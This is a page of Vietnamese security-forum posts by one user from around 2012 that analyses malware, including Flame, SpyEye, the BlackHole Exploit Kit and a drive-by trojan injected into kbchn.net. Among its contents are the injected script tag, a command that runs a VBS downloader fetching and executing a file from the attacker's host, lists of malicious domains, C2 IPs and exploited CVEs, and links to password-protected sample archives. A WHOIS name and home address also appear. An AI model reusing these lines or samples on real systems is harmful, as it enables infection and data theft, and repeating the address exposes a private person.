banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: miyumi2  XML
Profile for miyumi2 Messages posted by miyumi2 [ number of posts not being displayed on this page: 0 ]
 
Bạn gửi link cụ thể để xem toàn bộ HTML source mới biết bị inject chỗ nào.
Mấy cái shellcode này chắc cũng phát tán xâm nhập qua các exploit framework "công nghiệp" thôi smilie
Con này thuộc họ trojan Win32:Nebuler.

chiro8x wrote:
Bồ ơi tớ làm như bồ nói rồi sao wrong password nhỉ, tớ có PM bồ rồi. 

HEX chữ hoa nhe các bạn
http://www.mediafire.com/?9kve51vuczzf5rt
(pass là mã hex viết liền của tên file, bỏ .ext)

Dump of file 00004784.dl:
Code:
3 0 0000E94B QDInit
4 1 0000E94B SetObjectDescriptor
1 0001A817 [NONAME]
2 000206A3 [NONAME]

Dump of file 296e04abb00ea5f18ba021c34e486746:
Code:
1 0 00001077 RpcNsBindingInit

Dump of file 37c97c908706969b2e3addf70b68dc13:
Code:
2 0 0019DDFC CPlApplet
3 1 0019DE26 DDEInit
4 2 0000108E DDEnumCallback
5 3 00064BF4 GetAuthMechanism
6 4 0019DE71 InprocServer
7 5 000F42C9 QueryValueEx
8 6 000011DE SetAuthMechanism
1 7 000011D6 SetEnumStructure
9 8 000012AD ValueEnumCallback

Dump of file advnetcfg.ocx:
Code:
3 0 000030F0 DisableTBS
2 1 00002E9D EnableTBS
1 2 000033A4 UpdateTBSList

Dump of file advnetcfg2.ocx:
Code:
3 0 00002B99 DisableTBS
2 1 000029EE EnableTBS
1 2 00002DBD UpdateTBSList

Dump of file msglu32.ocx:
Code:
4 0 0000501E QDInit
3 1 000050B2 QDRunW
5 2 00004FDB SetObjectDescriptor
1 000083C0 [NONAME]
2 00008485 [NONAME]

Dump of file mssecmgr.ocx:
Code:
2 0 0019DDFC CPlApplet
3 1 0019DE26 DDEInit
4 2 0000108E DDEnumCallback
5 3 00064BF4 GetAuthMechanism
6 4 0019DE71 InprocServer
7 5 000F42C9 QueryValueEx
8 6 000011DE SetAuthMechanism
1 7 000011D6 SetEnumStructure
9 8 000012AD ValueEnumCallback

Dump of file nteps32.ocx:
Code:
4 0 00008A44 CreateABHList
14 1 0000B79A CreatePGHDict
7 2 00003E10 DisableDLV
12 3 0000B359 DisableOFR
2 4 000085A4 DisableSHR
6 5 00003D71 EnableDLV
11 6 0000B106 EnableOFR
1 7 00008480 EnableSHR
5 8 00008A89 FreeABHData
3 9 00008942 GetSML
13 A 0000B6D3 GetWPF
10 B 0000657D ReadVBInfo
8 C 000040A8 RestoreSMLData
9 D 0000653A WriteVBInfo

Dump of file soapr32.ocx:
Code:
1 0 00001077 RpcNsBindingInit
 

Nhìn sơ qua giống 1 application hơn là 1 virus smilie Các file đều để nguyên xi (compile bằng Microsoft Visual C++), không có pack, trừ các "em bé" trong bụng đã được crypt, version info đều ghi giả mạo Microsoft Corporation.


"...Flame còn tinh vi và nguy hiểm gấp 20 lần so với Stuxnet."
"...có thể phải mất 10 năm để hiểu được mọi hoạt động mà Flame có thể gây ra." 

- http://vnmedia.vn/VN/cong-nghe/tin-tuc/35_295631/phat_hien_ma_doc_chuyen_doc_trom_email.html
- http://www.wired.com/threatlevel/2012/05/flame/
- http://www.forbes.com/sites/timworstall/2012/05/29/the-real-flame-wars-w32-flamer-found-all-over-the-middle-east/

Phân tích kỹ thuật:
http://www.crysys.hu/skywiper/skywiper.pdf 

Con này đã phát tán cách đây từ 5 đến 8 năm, chủ yếu ở
khu vực Trung Đông, đặc biệt là Iran, sử dụng tới 5 giải thuật mã hóa, 3 kỹ thuật nén dữ liệu và ít nhất 5 định dạng (format) lưu trữ khác nhau, ngoài ra còn sử dụng cơ sở dữ liệu SQLite 3.6 để lưu trữ thông tin đánh cắp được.

Khả năng của mã độc Flame:
- Kích hoạt micrô của các máy tính bị nhiễm Flame và ghi lại các cuộc đàm thoại Skype cũng như cuộc nói chuyện của những người gần đó.
- Chụp màn hình các email và tin nhắn tức thời cũng như các hoạt động khác.
- Bật kết nối Bluetooth, quét tên và số điện thoại liên lạc ghi trên thiết bị.
- Quét mạng để dò tìm tên và mật khẩu đăng nhập.
- Xóa các tệp tin để xóa sạch dấu vết tồn tại của chúng.

(VnMedia)
http://msdn.microsoft.com/en-us/library/windows/hardware/ff548173%28v=vs.85%29.aspx



http://en.wikipedia.org/wiki/Architecture_of_Windows_NT



Tài liệu này của Microsoft cũng khá đầy đủ:
Windows Kernel Architecture Internals
http://research.microsoft.com/en-us/um/redmond/events/wincore2010/Dave_Probert_1.pdf
Trang web cuối (sau wwwect) "hù dọa" bằng cách làm giả giao diện phần mềm anti-virus (fake) đang quét ổ đĩa và "phát hiện" ra nhiều "virus" hiển thị thành 1 danh sách y như thật, từ đó dẫn dụ yêu cầu nạn nhân download 1 phần mềm quét virus nhưng thực chất đó là 1 badware (có thể là trojan, adware, spamware,...).




Chiêu này có lâu rồi nhưng chắc cũng không ít người bị dính!

Nếu bạn bấm chạy (Open) file sau khi download/save thì 100% máy bạn đã dính chấu, cần cài 1 phần mềm AV xịn để quét (nhưng chưa chắc sạch hết!).
Chắc là các file source trang web của bạn bị chèn các đoạn javascript để tự động gọi java applet download và chạy file test.exe.
Cách đơn giản là mở từng file source xoá đoạn javascript, ngoài ra phải kiểm tra nguyên nhân web của bạn xâm nhập và sửa đổi source được (password FTP yếu, SQL Injection, upload file/image, ...).
Nếu host Windows không loại trừ khả năng đã bị cài backdoor để chiếm quyền điều khiển lâu dài, trường hợp này cài anti-virus quét thử xem sao.
Mình đoán là service IIS bị stop, nguyên nhân stop được report vào event viewer nên bạn chụp hình hay export log trong Event Viewer post lên đây mới biết được, thông tin chung chung như vậy không giải quyết được.
Bạn vô Control Panel xem Event Viewer có thông tin báo lỗi gì liên quan IIS không?

hoahongtuoi wrote:

chiro8x wrote:
Thực lòng em không cảm thấy tin tưởng vào các ISP của Việt Nam lắm, chúng ta sử dụng internet thông qua các thiết bị mạng và các thiết bị này được phân phối thông qua các ISP. ISP sẽ biết đích xác là ai dùng thiết bị gì, tại địa điểm nào, username đăng nhập vào hệ thống là gì.
 

Đề nghị bạn nói rõ những nhận định mình trích ở trên, sử dụng căn cứ kỹ thuật, không nhận định cảm tính.
 


Làm thế nào nhà mạng thống kê được lưu lượng sử dụng internet (dù là cáp đồng, cáp quang hay usb 3G) để cuối tháng in hóa đơn tính tiền cho bạn? Bạn tự tìm hiểu, đó cũng sẽ là lời giải thích cho đề nghị của bạn.
Thấy anh TQN đang phân tích em này (post trên FB) nên mình cũng xin được tham gia 1 tí cho vui smilie
http://www.mediafire.com/?1ecnlmadgdacsda
http://www.mediafire.com/download.php?9bo57outrj3ds7h 

Dùng công cụ "mì ăn liền" ra được 1 số kết quả:
http://anubis.iseclab.org/?action=result&task_id=1fb329ad44e85331455b2eb38b97922f9&format=html
- HTTP Conversations:
From ANUBIS:1029 to 66.220.158.11:80 - [facebook.com]
Request: GET /
Response: 301 "Moved Permanently"
Request: POST /ajax/chat/settings.php?__a=1
Response: 200 "OK"
Request: POST /ajax/chat/buddy_list.php?__a=1
Response: 200 "OK"
From ANUBIS:1030 to 69.171.242.74:80 - [www.facebook.com]
Request: GET /
Response: 200 ""
 

Kết hợp với data-mining:

 


Tổng hợp các kết quả trên có thể dự đoán tóm tắt các hoạt động của em này như sau:
1. Khi chạy sẽ tự copy vào c:\windows\iqs.exe, đặt registry để tự chạy mỗi khi khởi động máy

2. Mở firewall cho file iqs.exe (đặt tên là Microsoft Firevall Engine và MSN Messenger)

3. Tắt service wuauserv (Window Update), chắc là để vô hiệu hóa tool MRT của Microsoft

4. Vô hiệu hoá các phần mềm anti-virus (Kaspersky, Microsoft Esstential - Windows Defender, AntiVir, Avira, AVG), cách đơn giản là sử dụng hàm API NtTerminateProcess để end task tắt tiến trình process.

5. Tìm các window của các chương trình chat (là ICQ, YIM, GTalk) để lấy danh sách nick chat (sử dụng Windows API: FindWindow, GetWindowText,...), Facebook thì dùng API để gửi HTTP request (POST, GET) và sử dụng Windows API truy cập vào HTML DOM (Internet Explorer_Server, DocObject, IEFrame,...) để lấy dữ liệu, sau đó gửi tất cả về "nơi xa", có thể là compiler.r-t-x.com, hoặc 1 host khác tùy theo master server, cũng có thể kết nối thông qua 1 proxy server 74.208.228.202:5050 để gửi dữ liệu.
Tham khảo API FB:
- http://security.stackexchange.com/questions/3570/facebook-spam-phishing-attempt
- http://www.phpkode.com/source/s/facebook-chat/facebook.class.php
- http://imfreedom.org/wiki/Facebook


6. Tự động gửi link lây lan đến các bạn chat trong danh sách (maybe).

7. Đặt lại Trang chủ (Homepage) của các trình duyệt Chrome, Firefox, Internet Explorer, cụ thể đặt link nào thì mình chưa có test tiếp. 


Các hoạt động khác như truy cập history của chương trình chat, history của trình duyệt, chỉnh sửa tham số TCP/IP (Winsock) trên Windows, hook hệ thống... có hay không và cụ thể làm những gì thì mình chưa có thời gian phân tích tiếp.
Phân tích mì ăn liền con này được 1 số kết quả:
http://eureka.cyber-ta.org/OUTPUT/5b1e1534c828d398b0ae91820913911f/ 
(trang http://eureka.cyber-ta.org/ unpacked .exe và cho down về).
http://malwr.com/analysis/5b1e1534c828d398b0ae91820913911f/ 

http://anubis.iseclab.org/?action=result&task_id=1f63a15db72d290947595dc73387528ae&format=html

3.d) wuauclt.exe - Network Activity
- HTTP Conversations:
From ANUBIS:1030 to 91.139.236.32:80 - [losfakers.ru]
Request: POST /and/image.php
Response: 200 "OK"
From ANUBIS:1032 to 89.44.198.188:80 - [losfakers.ru]
Request: GET /t.exe
Response: 200 "OK"
From ANUBIS:1034 to 81.161.207.102:80 - [losfakers.ru]
Request: POST /and/image.php
Response: 200 "OK"  


Phân tích host:
91.139.236.32
Ventsislav Marinov Sakadjiyski
Global Communication Net Plc.
4 Kavala Str.
Haskovo
Bulgaria

89.44.198.188
CRISTIAN BIRJARU
ALTIS NET SRL
STR. Marasesti Nr. 9-11
Rosiorii de Vede Teleorman 145100
Romania

81.161.207.102
POL KASKADA Artur Lagodzinski
Jana Kilinskiego 35
Jarocin 63-200
Poland 
SpyEye steals your data. Even in a limited account
http://www.prevx.com/blog/149/SpyEye-steals-your-data-Even-in-a-limited-account.html
It is a new toolkit called SpyEye.
After this it injects its code inside all the processes it could get access. In every infected process it hooks the following Windows APIs:

CryptEncrypt,LdrLoadDll,NtEnumerateValueKey,NtQueryDirectoryFile,NtResumeThread,NtVdmControl

This allows the trojan to hide its folder and its registry key from the user's eyes and antivirus software, implementing user mode rootkit techniques.

Inside browser processes, the trojan hooks even the following APIs:

TranslateMessage,send,HttpSendRequestA,HttpSendRequestW,InternetCloseHandle

By doing so, it's able to steal all sensitive data going out through the browser session, even SSL encrypted web pages. Using this technique it is even able to conceptually bypass classic anti-keyloggers that encrypt keystrokes.  


Win32/Spy.SpyEye.B
http://www.eset.eu/encyclopaedia/win32-spy-spyeye-b-trojan-pincav-shd-backdoor
Tình cờ em gu-gồ được mấy link chứa cùng 1 con trojan, download về xem thử thấy cùng 1 nguồn từ "Russia mercenaries" với info.exe:
bannersintpro.org/files/97d19
ligaworldtraders.org/files/97d19
perskitest.org/files/97d19
tartcompanyltd.com/files/97d19
 

http://www.mediafire.com/download.php?sf59eb1m6txlbb8
Pass: 123


 


Kết hợp với kết quả RCE của anh TQN thì có thể thấy sự việc như thế này: "ai đó" đã thuê "Russia mercenaries" phát tán trojan (exe hoặc dll), khi nhận được file này thì hacker Nga sẽ nhúng trojan này vào exe engine của họ, engine này có chức năng che dấu trojan của của người thuê (bằng cách hook 1 số hàm API đặc biệt như đã capture ở trên: NtQueryDirectoryFile, NtVdmControl, NtResumeThread,...), sau đó thì họ dùng BlackHole Exploit Kit hoặc các bộ Kit khác để phát tán "sản phẩm cuối cùng" qua mail phishing web, facebook...
Ngoài kết quả phân tích tự động bằng sandbox trên ThreatExpert như bolzano đã gửi:
http://www.threatexpert.com/report.aspx?md5=46a69641d00f656e5e9b6fedd12f96f3

Trojan này còn hook 1 số hàm API tương đối đặc biệt:

1. Trước khi chạy info.exe

 


2. Các process bị hooked sau khi chạy info.exe

 
Một số thông tin về BlackHole Exploit Kit được cài trên máy chủ fb-sv10.co.uk:

1. Các exploit được sử dụng để phát tán malware phiên bản 1.x.x:
CVE-2006-0003
MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution

CVE-2007-5659/2008-0655
PDF Exploit -collab, collectEmaillnfo

CVE-2008-2992
PDF Exploit• util.printf

CVE-2009-0927
PDF Exploit- collab.getlcon

CVE-2010-0188
PDF Exploit - LibTiff Integer Overflow

CVE-2010-0842
JAVA MIDI Java OBE
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27

CVE-2010-1885
Help Center URL Validation Vulnerability

CVE-2011-0559
Flash 10 by exm
Denial of service (memory corruption) via crafted parameters

CVE-2011-3544
Vulnerability in the Rhino Script Engine

CVE-2012-0507
Java Atomic

CVE-2010-0840
JAVA TC (?) javagetval OBE Java invoke / Java Trust
Trusted Method Chaining - Java getValue Remote Code Execution

CVE-2010-0886
Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components

CVE-2010-3552
JAVA SKYLINE
Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows 


2. Minh họa:
http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png


Blackhole Exploit Kit control panel

http://imperva.typepad.com/.a/6a01156f8c7ad8970c0162fdb83241970d-pi



3. Giá bán/cho thuê: smilie
1,500 usd/1 năm
1,000 usd/6 tháng
700 usd/3 tháng 


4. Reference:
Danh sách các Exploit Kit và CVE:
http://www.mediafire.com/?vwizwswtwx9p1q3

Deconstructing the Black Hole Exploit Kit
http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html

Blackhole 1.2.3 released
http://xylibox.blogspot.com/2012/03/blackhole-v123.html
...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content'). 
Em mò được một số domain liên quan:

fb-sv02.com
fb-sv03.co.uk
fb-sv04.co.uk
fb-sv05.co.uk
fb-sv06.co.uk
fb-sv07.co.uk
fb-sv08.co.uk
fb-sv09.co.uk
fb-sv10.co.uk


1. Thông tin người đăng ký:
Registrant:
Annette Kathleen Fisher

Registrant type:
UK Individual

Registrant's address:
183 Albion Way
Verwood
Dorset
BH31 7LT
United Kingdom


Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS]
URL: http://www.fasthosts.co.uk 


2. Thông tin kết nối port:
fb-sv07.co.uk
Port 22: SSH-2.0-OpenSSH_5.3
Port 80: nginx/0.8.54
---> http://fb-sv07.co.uk/installation/index.php smilie

fb-sv09.co.uk
Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5
Port 80: Server: nginx/0.6.32

fb-sv10.co.uk
Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308
Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT
Port 80: Server: nginx/1.1.18
 


3. Thông tin hosting:
fb-sv07.co.uk (83.69.226.219)
LTD AWAX Telecom
Moscow, Orlovo-Davydovsky per., 2/5 str
129110 Moscow, Russia
+7 495 6264747
+7 495 6264747

fb-sv10.co.uk (79.137.213.115)
Digital Network NOC
13a, Yaroslavskaya st.,
Moscow, Russia, 129366
+7 495 660 8383
+7 495 660 8383

fb-sv02.com (146.185.249.34)
Petersburg Internet Network ltd.
PIN ROLE
Russia, SPb, Sedova 80
 


4. Reference:
http://google.com/safebrowsing/diagnostic?site=zaminnews.com/
Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/

http://google.com/safebrowsing/diagnostic?site=eccie.net/
Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/.

http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/
Malicious software includes 92 trojan(s), 48 scripting exploit(s).
 


Theo em thì chắc đây là một tổ chức hacker đánh thuê của Nga smilie
Còn STL có thuê bọn này hay không thì chúng ta cần analyze tiếp dựa trên thông tin tài khoản Facebook đã post comment và payload (info.exe) của BlackHole Kit.
Vụ mùa trồng trọt mới này coi bộ hấp dẫn à nhe smilie
Chơi đủ loại exploit: JAVA applet; PDF exploit; HCP protocol exploit; VBS script...

Sao thấy giống giống đợt trồng trọt ở KBCHN.NET hé smilie

Em down được 1 số file đang ngâm cứu thử, obfuscate cho dữ vào nhưng mà đường nào rồi cũng dẫn tới Roma thôi hehe smilie
Máy của bạn bị nhiễm con Ramnit rồi, bạn xem lại ở đây nhe:

/hvaonline/posts/list/41645.html#259223

https://www.virustotal.com/file/d8eed1a70a70a6b72e7a398eb50a00877cdaca9f0d8a2dacb6ab4b8aa604e5f3/analysis/
Dùng NAT thì bên ngoài cũng chỉ thấy 1 IP thôi, cho dù bên trong mạng LAN có bao nhiêu máy đi chăng nữa.

Nếu mục đích muốn xâm nhập vào 1 máy bên trong thì chỉ có cách truy cập vào modem thiết lập Port Forwarding hoặc DMZ, còn chơi kiểu tà đạo thì cài cắm trồng trọt trojan, netcat là chuyện khác.

Còn kiểm tra proxy thì dùng trang này cũng tạm:
http://all-nettools.com/toolbox/environmental-variables-test.php

chiro8x wrote:
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình smilie. Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1.

Ý của mình là, duyên cớ nào bạn để ý tới :
http://daily.us.to/js/jquery.php

Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?. 


Chỉ là sự tình cờ thôi bạn à. Khi truy cập trang web này cũng như vô số trang khác từ Google thì Firefox bật lên thông báo missing plug-in, xem chi tiết thấy tên plug-in là Java Runtime.... Mình đoán là có vấn đề vì 1 trang web tin tức thì nhúng java applet để làm gì.
View source HTML thì không thấy thẻ <APPLET> nào --> chắc là dùng javascript để write vào document --> tìm tiếp các file .js thì phát hiện ra file vi.js có url http://daily.us.to/js/jquery.php. Đơn giản là vậy thôi! smilie

ODSERV.EXE (nguồn từ fake Unikey) và FBAgent.exe (nguồn từ KBCHN.NET), cả hai cùng chung 1 "big boss" nên từ giờ chắc phải sát nhập 2 topic lại quá smilie

FakeUnikey_extract_01.zip, topic:
/hvaonline/posts/list/41771.html#260312

quygia128 wrote:
Bác miyumi2 extract cái file sao hay vậy ? (File thứ 3 bác gửi lên ấy 101.exe) quy bị terminate với thằng FBAgent.exe mà chưa tìm được giải pháp nè (chạy trên VirtualBox). 


Mình dùng "gậy ông đập lưng ông" tức là lợi dụng chính cái chiêu "Kim Thiền thoát xác" của mèo-què rss.xml đó mà smilie

Bật mí chút xíu là mình dùng chiêu này để moi từ trong bụng con ODSERV.EXE (con đẻ mèo què FakeUnikey, tạo service trong hệ thống với tên odservice) lấy ra được 1 file exe khác cũng có kích thước 59.392 bytes y chang kích thước file 101.exe (nội dung thì có khác đôi chút) smilie

@TQN: Anh đừng cười nha, em chưa học xong mấy trang bí kiếp RE của anh nên đành dùng chiêu này tạm vậy smilie

FakeUnikey_extract_01.zip: http://www.mediafire.com/download.php?13dbeapfrsmy4va
Pass: 123

TQN wrote:

Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.
 


Extract thêm được 1 chú từ FBAgent.exe:
http://www.mediafire.com/download.php?yt996448h6z8ci7
Pass: 123

xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang http://kbchn.net/ và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được. 



bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái, phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl.
Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment). 


Cho mình ngoài lề một chút.
Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan.

Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET):

- http://www.youtube.com/watch?v=zPDnaUo1IPM

- www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html
(link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?)
- CACHED:
http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn

P/S: http://www.tienphong.vn/Tim-Kiem/Index.html?keyword=kbchn
Tiếp tục chạy file rss.xml (đổi tên thành rss.exe) sẽ thấy rất giống chiêu "Kim Thiền thoát xác" của trojan nhúng trong Unikey:
- Tạo file 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp
- Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service).
- Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp.

File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được.

http://www.mediafire.com/download.php?42c4ca67blcfksi
Pass: 123
23h ngày 28/3/2012 (GMT+7)

1. Đoạn mã khởi tạo đầu tiên được chèn vào cuối file http://kbchn.net/js/language/vi.js
Code:
document.write('<script language="javascript" src="http://daily.us.to/js/jquery.php"></script>');

2. File jquery.php này chỉ trả về dữ liệu (javascript text) nếu trong HTTP header có:
Code:
Referer: http://kbchn.net/
nếu Referer khác sẽ trả về "Error!".

3. Đoạn javascript này
Code:
document.write(base64_decode('PGFwcGxldCB3aWR0aD0nMScgaGVpZ2.....

sẽ chèn một JAVA APPLET​​ chạy code thông qua exploit của JRE
Code:
http://daily.us.to/js/MediaPlayer.jar

4. Mục đích chạy applet là tạo và thực thi 1 file .vbs (yahadfq.vbs) trong thư mục TEMP, khi file này chạy sẽ dùng CreateObject khởi tạo ADODB.Stream lưu lại file lấy từ 1 URL (dùng WinHttp.WinHttpRequest)
Code:
start /MIN %temp%\yahadfq.vbs http://daily.us.to/js/rss.xml %temp%\phfvxlr.exe

--> File rss.xml là 1 exe sau khi tải về sẽ đổi tên thành phfvxlr.exe và chạy.

Trong file exe này có 3 resource (TYPELIB 1000, 1010, 1011) với chuỗi header đầu tiên là MSFT.

Đến đây em đuối rồi, đi tắm thôi smilie, các anh em nào rảnh thì RE con exe này tiếp xem thế nào.

Tất cả các file em thu thập được trong quá trình phân tích:
http://www.mediafire.com/?79yupp68ip3ogbq
Pass: 123

Cached:
Code:
http://liveweb.archive.org/http://kbchn.net/js/language/vi.js
 http://liveweb.archive.org/http://daily.us.to/js/MediaPlayer.jar
 http://liveweb.archive.org/http://daily.us.to/js/rss.xml
Gắn cái 3G vô router *nix, mỗi lần user login thì send 1 sms verify code vào số đt của user đó (ý tưởng thôi chứ em chưa làm bao giờ) smilie
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|